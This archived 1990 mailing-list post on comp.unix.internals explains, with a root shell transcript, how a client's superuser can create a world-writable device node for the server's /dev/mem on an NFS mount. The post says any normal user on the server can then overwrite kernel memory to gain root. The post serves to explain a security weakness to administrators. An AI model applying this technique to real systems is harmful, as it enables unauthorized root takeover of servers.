becoming root via NFS

Tom Christiansen tchrist at convex.COM
Thu Dec 20 05:05:41 AEST 1990 

[ I've gotten nothing but confused and disbelieving mail on this,
  so apparently I did not adequately describe the scenario. ]

>From the keyboard of rbj at uunet.UU.NET (Root Boy Jim):
:In article <111544 at convex.convex.com> tchrist at convex.COM (Tom Christiansen) writes:
:I follow you so far, but...
:
:? Do a mknod 
:? giving it the major,minor numbers of /dev/mem on the server,
:? not the workstation.
:
:Um, only root can do a mknod, `nobody' can't.


Says who?  This isn't so.  I'm on my workstation.  I'm the superuser.
I've got the trusting server's filesystem mounted on my system.
(It's a diskless 350, so I have to have something.)   I can certainly
do the mknod.  Watch (I'm root at cthulhu, my workstation):

cthulhu# df .
Filesystem            kbytes    used   avail capacity  Mounted on
globhost:/usr/spool/globdata
                      371967  280812   53958    84%    /rmt/globhost/globdata

    [ ``globhost'' is another Sun, but this works with non-Sun NFS 
	systems as well. ]

cthulhu# ls -lgd .
drwxrwxrwt 43 root     bin          4096 Dec 19 11:52 ./

    [ Even if it weren't world-write, I could become the owner
      and make a world-write subdir. ]


cthulhu# ls -lg /dev/mem
crw-r-----  1 root     kmem       3,   0 May 29  1990 /dev/mem

cthulhu# mknod mymem c 3 0

    [ I actually have to choose the right major/minor number 
      for the server, not the client, if it's his kernel I 
      wish to crack. ]


cthulhu# ls -l  mymem
crw-r--r--  1 -2         3,   0 Dec 19 11:49 mymem

    [ See, I made it fine, and it's owned by "nobody". ]

cthulhu# chmod 666 mymem

cthulhu# ls -l mymem
crw-rw-rw-  1 -2         3,   0 Dec 19 11:58 mymem


Now, go over to the server and you can write his kernel as a normal user.
I've already demo'd how to use adb to punch your shell's uid to 0,
although you should get the cred structure, too.  You could also make a
nice disk device and read things if you want.

--tom
--
Tom Christiansen		tchrist at convex.com	convex!tchrist
"With a kernel dive, all things are possible, but it sure makes it hard
 to look at yourself in the mirror the next morning."  -me

More information about the Comp.unix.internals mailing list